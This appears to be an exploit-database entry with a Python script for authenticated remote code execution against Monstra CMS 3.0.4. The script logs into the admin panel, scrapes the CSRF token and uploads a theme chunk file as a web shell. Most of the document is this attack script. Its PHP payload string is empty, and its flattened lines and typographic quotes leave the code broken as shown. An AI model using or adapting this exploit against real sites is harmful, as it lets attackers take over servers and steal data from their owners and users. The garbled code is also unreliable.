Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)

Exploit Author: Ahmet Ümit BAYRAM

Date: 05.05.2024

Vendor Homepage: https://monstra.org/

Software Link: https://monstra.org/monstra-3.0.4.zip

Version: 3.0.4

Tested on: MacOS

```python import requests import random import string import time import re import sys

if len(sys.argv) < 4: print(“Usage: python3 script.py ") sys.exit(1)

base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3]

session = requests.Session()

login_url = f’{base_url}/admin/index.php?id=dashboard’ login_data = { ‘login’: username, ‘password’: password, ‘login_submit’: ‘Log+In’ }

filename = ‘‘.join(random.choices(string.ascii_lowercase + string.digits, k=5))

print(“Logging in…”) response = session.post(login_url, data=login_data)

if ‘Dashboard’ in response.text: print(“Login successful”) else: print(“Login failed”) exit()

time.sleep(3)

edit_url = f’{base_url}/admin/index.php?id=themes&action=add_chunk’ response = session.get(edit_url) # CSRF token bulmak için edit sayfasına erişim

token_search = re.search(r’input type=”hidden” id=”csrf” name=”csrf” value=”(.*?)”’, response.text) if token_search: token = token_search.group(1) else: print(“CSRF token could not be found.”) exit()

content = ‘’’

’’’

edit_data = { ‘csrf’: token, ‘name’: filename, ‘content’: content, ‘add_file’: ‘Save’ }

print(“Preparing shell…”) response = session.post(edit_url, data=edit_data) time.sleep(3)

if response.status_code == 200: print(f”Your shell is ready: {base_url}/public/themes/default/{filename}.chunk.php”) else: print(“Failed to prepare shell.”)